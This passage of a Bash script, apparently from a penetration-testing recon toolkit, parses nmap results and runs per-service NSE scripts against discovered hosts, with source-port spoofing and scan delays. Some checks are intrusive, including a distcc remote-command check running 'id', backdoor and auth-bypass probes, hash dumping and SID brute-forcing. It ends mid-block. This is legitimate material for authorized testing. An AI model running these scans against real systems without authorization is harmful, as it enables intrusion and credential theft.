egrep -v '(0000:|0010:|0020:|0030:|0040:|0050:|0060:|0070:|0080:|0090:|00a0:|00b0:|00c0:|00d0:|1 hop|closed|guesses|GUESSING|filtered|fingerprint|FINGERPRINT|general purpose|initiated|latency|Network Distance|No exact OS|No OS matches|OS:|OS CPE|Please report|RTTVAR|scanned in|SF|unreachable|Warning|WARNING)' $name/nmap.nmap | sed 's/Nmap scan report for //; /^$/! b end; n; /^$/d; : end' > $name/nmap.txt
# All live IPs, uniquely sorted by $sip.
grep -o '[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}\.[0-9]\{1,3\}' $name/nmap.nmap | $sip > $name/hosts.txt
hosts=$(wc -l $name/hosts.txt | cut -d ' ' -f1)
# Unique open ports (e.g. "80/tcp"), then split into TCP and UDP lists.
grep 'open' $name/nmap.txt | grep -v 'WARNING' | awk '{print $1}' | sort -un > $name/ports.txt
grep 'tcp' $name/ports.txt | cut -d '/' -f1 > $name/ports-tcp.txt
grep 'udp' $name/ports.txt | cut -d '/' -f1 > $name/ports-udp.txt
# Service banner strings: everything from field 4 onward of each open-port line.
grep 'open' $name/nmap.txt | grep -v 'really open' | awk '{for (i=4;i<=NF;i++) {printf "%s%s",sep, $i;sep=" "}; printf "\n"}' | sed 's/^ //' | sort -u | sed '/^$/d' > $name/banners.txt
# Build http:// and https:// target lists ("host:port") from the greppable
# output, matching the per-port service labels nmap assigns.
for i in $(cat $name/ports-tcp.txt); do
TCPPORT=$i
cat $name/nmap.gnmap | grep " $i/open/tcp//http/\| $i/open/tcp//http-alt/\| $i/open/tcp//http-proxy/\| $i/open/tcp//appserv-http/" |
sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.http://.g' -e "s/$/:$i/g" | $sip >> tmp
cat $name/nmap.gnmap | grep " $i/open/tcp//https/\| $i/open/tcp//https-alt/\| $i/open/tcp//ssl|giop/\| $i/open/tcp//ssl|http/\| $i/open/tcp//ssl|unknown/" |
sed -e 's/Host: //g' -e 's/ (.*//g' -e 's.^.https://.g' -e "s/$/:$i/g" | $sip >> tmp2
done
# Scheme-less copies for tools that want bare host:port.
sed 's/http:\/\///g' tmp > $name/http.txt
sed 's/https:\/\///g' tmp2 > $name/https.txt
# Remove all empty files
find $name/ -type f -empty -exec rm {} +
}
##############################################################################################################
f_ports(){
# Split the greppable nmap output into one file per interesting port
# ($name/<port>.txt, one IP per line), then merge related services
# (HBase, Bitcoin, DB2, Hadoop, NNTP, SMTP, X11) into combined lists.
echo
echo $medium
echo
echo -e "${BLUE}Locating high value ports.${NC}"
echo "     TCP"
TCP_PORTS="13 19 21 22 23 25 37 69 70 79 80 102 110 111 119 135 139 143 389 433 443 445 465 502 512 513 514 523 524 548 554 563 587 623 631 636 771 831 873 902 993 995 998 1050 1080 1099 1158 1344 1352 1433 1521 1720 1723 1883 1911 1962 2049 2202 2375 2628 2947 3000 3031 3050 3260 3306 3310 3389 3500 3632 4369 5000 5019 5040 5060 5432 5560 5631 5632 5666 5672 5850 5900 5920 5984 5985 6000 6001 6002 6003 6004 6005 6379 6666 7210 7634 7777 8000 8009 8080 8081 8091 8140 8222 8332 8333 8400 8443 8834 9000 9084 9100 9160 9600 9999 10000 11211 12000 12345 13364 19150 27017 28784 30718 35871 37777 46824 49152 50000 50030 50060 50070 50075 50090 60010 60030"
# Field 2 of a gnmap "Host:" line is the IP address.
for i in $TCP_PORTS; do
cat $name/nmap.gnmap | grep "\<$i/open/tcp\>" | cut -d ' ' -f2 > $name/$i.txt
done
# 523 and 5060 exist on both TCP and UDP; rename the TCP results now so
# the UDP pass below can't overwrite them.
if [[ -e $name/523.txt ]]; then
mv $name/523.txt $name/523-tcp.txt
fi
if [[ -e $name/5060.txt ]]; then
mv $name/5060.txt $name/5060-tcp.txt
fi
echo "     UDP"
UDP_PORTS="53 67 123 137 161 407 500 523 623 1434 1604 1900 2302 2362 3478 3671 4800 5353 5683 6481 17185 31337 44818 47808"
for i in $UDP_PORTS; do
cat $name/nmap.gnmap | grep "\<$i/open/udp\>" | cut -d ' ' -f2 > $name/$i.txt
done
if [[ -e $name/523.txt ]]; then
mv $name/523.txt $name/523-udp.txt
fi
# Combine Apache HBase ports and sort
cat $name/60010.txt $name/60030.txt > tmp
$sip tmp > $name/apache-hbase.txt
# Combine Bitcoin ports and sort
cat $name/8332.txt $name/8333.txt > tmp
$sip tmp > $name/bitcoin.txt
# Combine DB2 ports and sort
cat $name/523-tcp.txt $name/523-udp.txt > tmp
$sip tmp > $name/db2.txt
# Combine Hadoop ports and sort
cat $name/50030.txt $name/50060.txt $name/50070.txt $name/50075.txt $name/50090.txt > tmp
$sip tmp > $name/hadoop.txt
# Combine NNTP ports and sort
cat $name/119.txt $name/433.txt $name/563.txt > tmp
$sip tmp > $name/nntp.txt
# Combine SMTP ports and sort
cat $name/25.txt $name/465.txt $name/587.txt > tmp
$sip tmp > $name/smtp.txt
# Combine X11 ports and sort
cat $name/6000.txt $name/6001.txt $name/6002.txt $name/6003.txt $name/6004.txt $name/6005.txt > tmp
$sip tmp > $name/x11.txt
# Remove all empty files
find $name/ -type f -empty -exec rm {} +
}
##############################################################################################################
f_cleanup(){
# Filter the raw nmap script output in ./tmp down to interesting findings
# and write the result to ./tmp4 (callers then move tmp4 into place).
# Pipeline stages:
#   1. strip the "Nmap scan report for" prefix and service-fingerprint (SF) lines
#   2. drop a long list of known-noise / negative-result script messages
#   3. first awk: when a line starts with an IPv4 address, remember its line
#      number and skip the single line that immediately follows it if blank
#   4. second awk: around "sslv2-drown:" lines, hold the line and only print
#      it when the following line is non-empty (i.e. the script had output)
#   5. final awk: treat blank-line-separated chunks as records and keep only
#      hosts with more than 3 lines of remaining output
sed 's/Nmap scan report for //' tmp | sed '/^SF/d' | egrep -v '(0 of 100|afp-serverinfo:|ACCESS_DENIED|appears to be clean|cannot|closed|close|Compressors|Could not|Couldn|ctr-|Denied|denied|Did not|DISABLED|dns-nsid:|dns-service-discovery:|Document Moved|doesn|eppc-enum-processes|error|Error|ERROR|Failed to get|failed|filtered|GET|hbase-region-info:|HEAD|Host is up|Host script results|impervious|incorrect|is GREAT|latency|ldap-rootdse:|LDAP Results|Likely CLEAN|MAC Address|Mac OS X security type|nbstat:|No accounts left|No Allow|no banner|none|Nope.|not allowed|Not Found|Not Shown|not supported|NOT VULNERABLE|nrpe-enum:|ntp-info:|rdp-enum-encryption:|remaining|rpcinfo:|seconds|Security types|See http|Server not returning|Service Info|service unrecognized|Skipping|smb-check-vulns|smb-mbenum:|sorry|Starting|telnet-encryption:|Telnet server does not|TIMEOUT|Unauthorized|uncompressed|unhandled|Unknown|viewed over a secure|vnc-info:|wdb-version:)' | grep -v "Can't" | awk -v n=-2 'NR==n+1 && !NF{next} /^[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}\.[0-9]{1,3}/ {n=NR}1' | awk -v n=-2 'NR==n+1 && NF{print hold} /sslv2-drown:/ {n=NR;hold=$0;next}1' | awk -F '\n' 'BEGIN{RS="\n\n"}NF>3{print $0 "\n"}' > tmp4
}
##############################################################################################################
f_scripts(){
echo
echo $medium
echo
echo -e "${BLUE}Running Nmap scripts.${NC}"
# If the file for the corresponding port doesn't exist, skip
if [[ -e $name/13.txt ]]; then
echo " Daytime"
nmap -iL $name/13.txt -Pn -n --open -p13 --script-timeout 1m --script=daytime --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-13.txt
fi
if [[ -e $name/21.txt ]]; then
echo " FTP"
nmap -iL $name/21.txt -Pn -n --open -p21 --script-timeout 1m --script=banner,ftp-anon,ftp-bounce,ftp-proftpd-backdoor,ftp-syst,ftp-vsftpd-backdoor,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-21.txt
fi
if [[ -e $name/22.txt ]]; then
echo " SSH"
nmap -iL $name/22.txt -Pn -n --open -p22 --script-timeout 1m --script=sshv1,ssh2-enum-algos --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-22.txt
fi
if [[ -e $name/23.txt ]]; then
echo " Telnet"
nmap -iL $name/23.txt -Pn -n --open -p23 --script-timeout 1m --script=banner,cics-info,cics-enum,cics-user-enum,telnet-encryption,telnet-ntlm-info,tn3270-screen,tso-enum --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-23.txt
fi
if [[ -e $name/smtp.txt ]]; then
echo " SMTP"
nmap -iL $name/smtp.txt -Pn -n --open -p25,465,587 --script-timeout 1m --script=banner,smtp-commands,smtp-ntlm-info,smtp-open-relay,smtp-strangeport,smtp-enum-users,ssl*,tls-nextprotoneg -sV --script-args smtp-enum-users.methods={EXPN,RCPT,VRFY} --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-smtp.txt
fi
if [[ -e $name/37.txt ]]; then
echo " Time"
nmap -iL $name/37.txt -Pn -n --open -p37 --script-timeout 1m --script=rfc868-time --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-37.txt
fi
if [[ -e $name/53.txt ]]; then
echo " DNS"
nmap -iL $name/53.txt -Pn -n -sU --open -p53 --script-timeout 1m --script=dns-blacklist,dns-cache-snoop,dns-nsec-enum,dns-nsid,dns-random-srcport,dns-random-txid,dns-recursion,dns-service-discovery,dns-update,dns-zeustracker,dns-zone-transfer --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-53.txt
fi
if [[ -e $name/67.txt ]]; then
echo " DHCP"
nmap -iL $name/67.txt -Pn -n -sU --open -p67 --script-timeout 1m --script=dhcp-discover --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-67.txt
fi
if [[ -e $name/70.txt ]]; then
echo " Gopher"
nmap -iL $name/70.txt -Pn -n --open -p70 --script-timeout 1m --script=gopher-ls --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-70.txt
fi
if [[ -e $name/79.txt ]]; then
echo " Finger"
nmap -iL $name/79.txt -Pn -n --open -p79 --script-timeout 1m --script=finger --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-79.txt
fi
if [[ -e $name/102.txt ]]; then
echo " S7"
nmap -iL $name/102.txt -Pn -n --open -p102 --script-timeout 1m --script=s7-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-102.txt
fi
if [[ -e $name/110.txt ]]; then
echo " POP3"
nmap -iL $name/110.txt -Pn -n --open -p110 --script-timeout 1m --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-110.txt
fi
if [[ -e $name/111.txt ]]; then
echo " RPC"
nmap -iL $name/111.txt -Pn -n --open -p111 --script-timeout 1m --script=nfs-ls,nfs-showmount,nfs-statfs,rpcinfo --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-111.txt
fi
if [[ -e $name/nntp.txt ]]; then
echo " NNTP"
nmap -iL $name/nntp.txt -Pn -n --open -p119,433,563 --script-timeout 1m --script=nntp-ntlm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-nntp.txt
fi
if [[ -e $name/123.txt ]]; then
echo " NTP"
nmap -iL $name/123.txt -Pn -n -sU --open -p123 --script-timeout 1m --script=ntp-info,ntp-monlist --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-123.txt
fi
if [[ -e $name/137.txt ]]; then
echo " NetBIOS"
nmap -iL $name/137.txt -Pn -n -sU --open -p137 --script-timeout 1m --script=nbstat --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
sed -i '/^MAC/{n; /.*/d}' tmp4 # Find lines that start with MAC, and delete the following line
sed -i '/^137\/udp/{n; /.*/d}' tmp4 # Find lines that start with 137/udp, and delete the following line
mv tmp4 $name/script-137.txt
fi
if [[ -e $name/139.txt ]]; then
echo " SMB Vulns"
nmap -iL $name/139.txt -Pn -n --open -p139 --script-timeout 1m --script=smb* --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(SERVICE|netbios)' tmp4 > tmp5
sed '1N;N;/\(.*\n\)\{2\}.*VULNERABLE/P;$d;D' tmp5
sed '/^$/d' tmp5 > tmp6
grep -v '|' tmp6 > $name/script-smbvulns.txt
fi
if [[ -e $name/143.txt ]]; then
echo " IMAP"
nmap -iL $name/143.txt -Pn -n --open -p143 --script-timeout 1m --script=imap-capabilities,imap-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-143.txt
fi
if [[ -e $name/161.txt ]]; then
echo " SNMP"
nmap -iL $name/161.txt -Pn -n -sU --open -p161 --script-timeout 1m --script=snmp-hh3c-logins,snmp-info,snmp-interfaces,snmp-netstat,snmp-processes,snmp-sysdescr,snmp-win32-services,snmp-win32-shares,snmp-win32-software,snmp-win32-users -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-161.txt
fi
if [[ -e $name/389.txt ]]; then
echo " LDAP"
nmap -iL $name/389.txt -Pn -n --open -p389 --script-timeout 1m --script=ldap-rootdse,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-389.txt
fi
if [[ -e $name/443.txt ]]; then
echo " VMware"
nmap -iL $name/443.txt -Pn -n --open -p443 --script-timeout 1m --script=vmware-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-443.txt
fi
if [[ -e $name/445.txt ]]; then
echo " SMB"
nmap -iL $name/445.txt -Pn -n --open -p445 --script-timeout 1m --script=msrpc-enum,smb*,stuxnet-detect --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
sed -i '/^445/{n; /.*/d}' tmp4 # Find lines that start with 445, and delete the following line
mv tmp4 $name/script-445.txt
fi
if [[ -e $name/500.txt ]]; then
echo " Ike"
nmap -iL $name/500.txt -Pn -n -sS -sU --open -p500 --script-timeout 1m --script=ike-version -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-500.txt
fi
if [[ -e $name/db2.txt ]]; then
echo " DB2"
nmap -iL $name/db2.txt -Pn -n -sS -sU --open -p523 --script-timeout 1m --script=db2-das-info,db2-discover --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-523.txt
fi
if [[ -e $name/524.txt ]]; then
echo " Novell NetWare Core Protocol"
nmap -iL $name/524.txt -Pn -n --open -p524 --script-timeout 1m --script=ncp-enum-users,ncp-serverinfo --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-524.txt
fi
if [[ -e $name/548.txt ]]; then
echo " AFP"
nmap -iL $name/548.txt -Pn -n --open -p548 --script-timeout 1m --script=afp-ls,afp-path-vuln,afp-serverinfo,afp-showmount --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-548.txt
fi
if [[ -e $name/554.txt ]]; then
echo " RTSP"
nmap -iL $name/554.txt -Pn -n --open -p554 --script-timeout 1m --script=rtsp-methods --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-554.txt
fi
if [[ -e $name/623.txt ]]; then
echo " IPMI"
nmap -iL $name/623.txt -Pn -n -sU --open -p623 --script-timeout 1m --script=ipmi-version,ipmi-cipher-zero --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-623.txt
fi
if [[ -e $name/631.txt ]]; then
echo " CUPS"
nmap -iL $name/631.txt -Pn -n --open -p631 --script-timeout 1m --script=cups-info,cups-queue-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-631.txt
fi
if [[ -e $name/636.txt ]]; then
echo " LDAP/S"
nmap -iL $name/636.txt -Pn -n --open -p636 --script-timeout 1m --script=ldap-rootdse,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-636.txt
fi
if [[ -e $name/873.txt ]]; then
echo " rsync"
nmap -iL $name/873.txt -Pn -n --open -p873 --script-timeout 1m --script=rsync-list-modules --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-873.txt
fi
if [[ -e $name/993.txt ]]; then
echo " IMAP/S"
nmap -iL $name/993.txt -Pn -n --open -p993 --script-timeout 1m --script=banner,imap-capabilities,imap-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-993.txt
fi
if [[ -e $name/995.txt ]]; then
echo " POP3/S"
nmap -iL $name/995.txt -Pn -n --open -p995 --script-timeout 1m --script=banner,pop3-capabilities,pop3-ntlm-info,ssl*,tls-nextprotoneg -sV --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-995.txt
fi
if [[ -e $name/1050.txt ]]; then
echo " COBRA"
nmap -iL $name/1050.txt -Pn -n --open -p1050 --script-timeout 1m --script=giop-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1050.txt
fi
if [[ -e $name/1080.txt ]]; then
echo " SOCKS"
nmap -iL $name/1080.txt -Pn -n --open -p1080 --script-timeout 1m --script=socks-auth-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1080.txt
fi
if [[ -e $name/1099.txt ]]; then
echo " RMI Registry"
nmap -iL $name/1099.txt -Pn -n --open -p1099 --script-timeout 1m --script=rmi-dumpregistry --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1099.txt
fi
if [[ -e $name/1344.txt ]]; then
echo " ICAP"
nmap -iL $name/1344.txt -Pn -n --open -p1344 --script-timeout 1m --script=icap-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1344.txt
fi
if [[ -e $name/1352.txt ]]; then
echo " Lotus Domino"
nmap -iL $name/1352.txt -Pn -n --open -p1352 --script-timeout 1m --script=domino-enum-users --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1352.txt
fi
if [[ -e $name/1433.txt ]]; then
echo " MS-SQL"
nmap -iL $name/1433.txt -Pn -n --open -p1433 --script-timeout 1m --script=ms-sql-dump-hashes,ms-sql-empty-password,ms-sql-info,ms-sql-ntlm-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1433.txt
fi
if [[ -e $name/1434.txt ]]; then
echo " MS-SQL UDP"
nmap -iL $name/1434.txt -Pn -n -sU --open -p1434 --script-timeout 1m --script=ms-sql-dac --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1434.txt
fi
if [[ -e $name/1521.txt ]]; then
echo " Oracle"
nmap -iL $name/1521.txt -Pn -n --open -p1521 --script-timeout 1m --script=oracle-tns-version,oracle-sid-brute --script oracle-enum-users --script-args oracle-enum-users.sid=ORCL,userdb=orausers.txt --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1521.txt
fi
if [[ -e $name/1604.txt ]]; then
echo " Citrix"
nmap -iL $name/1604.txt -Pn -n -sU --open -p1604 --script-timeout 1m --script=citrix-enum-apps,citrix-enum-servers --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1604.txt
fi
if [[ -e $name/1723.txt ]]; then
echo " PPTP"
nmap -iL $name/1723.txt -Pn -n --open -p1723 --script-timeout 1m --script=pptp-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1723.txt
fi
if [[ -e $name/1883.txt ]]; then
echo " MQTT"
nmap -iL $name/1883.txt -Pn -n --open -p1883 --script-timeout 1m --script=mqtt-subscribe --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1883.txt
fi
if [[ -e $name/1911.txt ]]; then
echo " Tridium Niagara Fox"
nmap -iL $name/1911.txt -Pn -n --open -p1911 --script-timeout 1m --script=fox-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1911.txt
fi
if [[ -e $name/1962.txt ]]; then
echo " PCWorx"
nmap -iL $name/1962.txt -Pn -n --open -p1962 --script-timeout 1m --script=pcworx-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-1962.txt
fi
if [[ -e $name/2049.txt ]]; then
echo " NFS"
nmap -iL $name/2049.txt -Pn -n --open -p2049 --script-timeout 1m --script=nfs-ls,nfs-showmount,nfs-statfs --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2049.txt
fi
if [[ -e $name/2202.txt ]]; then
echo " ACARS"
nmap -iL $name/2202.txt -Pn -n --open -p2202 --script-timeout 1m --script=acarsd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2202.txt
fi
if [[ -e $name/2302.txt ]]; then
echo " Freelancer"
nmap -iL $name/2302.txt -Pn -n -sU --open -p2302 --script-timeout 1m --script=freelancer-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2302.txt
fi
if [[ -e $name/2375.txt ]]; then
echo " Docker"
nmap -iL $name/2375.txt -Pn -n --open -p2375 --script-timeout 1m --script=docker-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2375.txt
fi
if [[ -e $name/2628.txt ]]; then
echo " DICT"
nmap -iL $name/2628.txt -Pn -n --open -p2628 --script-timeout 1m --script=dict-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2628.txt
fi
if [[ -e $name/2947.txt ]]; then
echo " GPS"
nmap -iL $name/2947.txt -Pn -n --open -p2947 --script-timeout 1m --script=gpsd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-2947.txt
fi
if [[ -e $name/3031.txt ]]; then
echo " Apple Remote Event"
nmap -iL $name/3031.txt -Pn -n --open -p3031 --script-timeout 1m --script=eppc-enum-processes --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3031.txt
fi
if [[ -e $name/3260.txt ]]; then
echo " iSCSI"
nmap -iL $name/3260.txt -Pn -n --open -p3260 --script-timeout 1m --script=iscsi-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3260.txt
fi
if [[ -e $name/3306.txt ]]; then
echo " MySQL"
nmap -iL $name/3306.txt -Pn -n --open -p3306 --script-timeout 1m --script=mysql-databases,mysql-empty-password,mysql-info,mysql-users,mysql-variables --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3306.txt
fi
if [[ -e $name/3310.txt ]]; then
echo "     ClamAV"
nmap -iL $name/3310.txt -Pn -n --open -p3310 --script-timeout 1m --script=clamav-exec --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
# Bug fix: this previously read "mv tmp4 > $name/script-3310.txt", which
# redirected mv's stdout, made mv fail on a missing destination operand,
# and always left an empty report file.
mv tmp4 $name/script-3310.txt
fi
if [[ -e $name/3389.txt ]]; then
echo " Remote Desktop"
nmap -iL $name/3389.txt -Pn -n --open -p3389 --script-timeout 1m --script=rdp-vuln-ms12-020,rdp-enum-encryption --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(attackers|Description|Disclosure|http|References|Risk factor)' tmp4 > $name/script-3389.txt
fi
if [[ -e $name/3478.txt ]]; then
echo " STUN"
nmap -iL $name/3478.txt -Pn -n -sU --open -p3478 --script-timeout 1m --script=stun-version --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3478.txt
fi
if [[ -e $name/3632.txt ]]; then
echo " Distributed Compiler Daemon"
nmap -iL $name/3632.txt -Pn -n --open -p3632 --script-timeout 1m --script=distcc-cve2004-2687 --script-args="distcc-exec.cmd='id'" --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
egrep -v '(IDs|Risk factor|Description|Allows|earlier|Disclosure|Extra|References|http)' tmp4 > $name/script-3632.txt
fi
if [[ -e $name/3671.txt ]]; then
echo " KNX gateway"
nmap -iL $name/3671.txt -Pn -n -sU --open -p3671 --script-timeout 1m --script=knx-gateway-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-3671.txt
fi
if [[ -e $name/4369.txt ]]; then
echo " Erlang Port Mapper"
nmap -iL $name/4369.txt -Pn -n --open -p4369 --script-timeout 1m --script=epmd-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-4369.txt
fi
if [[ -e $name/5019.txt ]]; then
echo " Versant"
nmap -iL $name/5019.txt -Pn -n --open -p5019 --script-timeout 1m --script=versant-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5019.txt
fi
if [[ -e $name/5060.txt ]]; then
echo " SIP"
nmap -iL $name/5060.txt -Pn -n --open -p5060 --script-timeout 1m --script=sip-enum-users,sip-methods --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5060.txt
fi
if [[ -e $name/5353.txt ]]; then
echo " DNS Service Discovery"
nmap -iL $name/5353.txt -Pn -n -sU --open -p5353 --script-timeout 1m --script=dns-service-discovery --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5353.txt
fi
if [[ -e $name/5666.txt ]]; then
echo " Nagios"
nmap -iL $name/5666.txt -Pn -n --open -p5666 --script-timeout 1m --script=nrpe-enum --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5666.txt
fi
if [[ -e $name/5672.txt ]]; then
echo " AMQP"
nmap -iL $name/5672.txt -Pn -n --open -p5672 --script-timeout 1m --script=amqp-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5672.txt
fi
if [[ -e $name/5683.txt ]]; then
echo " CoAP"
nmap -iL $name/5683.txt -Pn -n -sU --open -p5683 --script-timeout 1m --script=coap-resources --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5683.txt
fi
if [[ -e $name/5850.txt ]]; then
echo " OpenLookup"
nmap -iL $name/5850.txt -Pn -n --open -p5850 --script-timeout 1m --script=openlookup-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5850.txt
fi
if [[ -e $name/5900.txt ]]; then
echo " VNC"
nmap -iL $name/5900.txt -Pn -n --open -p5900 --script-timeout 1m --script=realvnc-auth-bypass,vnc-info,vnc-title --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5900.txt
fi
if [[ -e $name/5984.txt ]]; then
echo " CouchDB"
nmap -iL $name/5984.txt -Pn -n --open -p5984 --script-timeout 1m --script=couchdb-databases,couchdb-stats --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-5984.txt
fi
if [[ -e $name/x11.txt ]]; then
echo " X11"
nmap -iL $name/x11.txt -Pn -n --open -p6000-6005 --script-timeout 1m --script=x11-access --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-x11.txt
fi
if [[ -e $name/6379.txt ]]; then
echo " Redis"
nmap -iL $name/6379.txt -Pn -n --open -p6379 --script-timeout 1m --script=redis-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6379.txt
fi
if [[ -e $name/6481.txt ]]; then
echo " Sun Service Tags"
nmap -iL $name/6481.txt -Pn -n -sU --open -p6481 --script-timeout 1m --script=servicetags --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6481.txt
fi
if [[ -e $name/6666.txt ]]; then
echo " Voldemort"
nmap -iL $name/6666.txt -Pn -n --open -p6666 --script-timeout 1m --script=voldemort-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-6666.txt
fi
if [[ -e $name/7210.txt ]]; then
echo " Max DB"
nmap -iL $name/7210.txt -Pn -n --open -p7210 --script-timeout 1m --script=maxdb-info --min-hostgroup 100 -g $sourceport --scan-delay $delay > tmp
f_cleanup
mv tmp4 $name/script-7210.txt
fi
if [[ -e $name/7634.txt ]]; then
echo " Hard Disk Info"
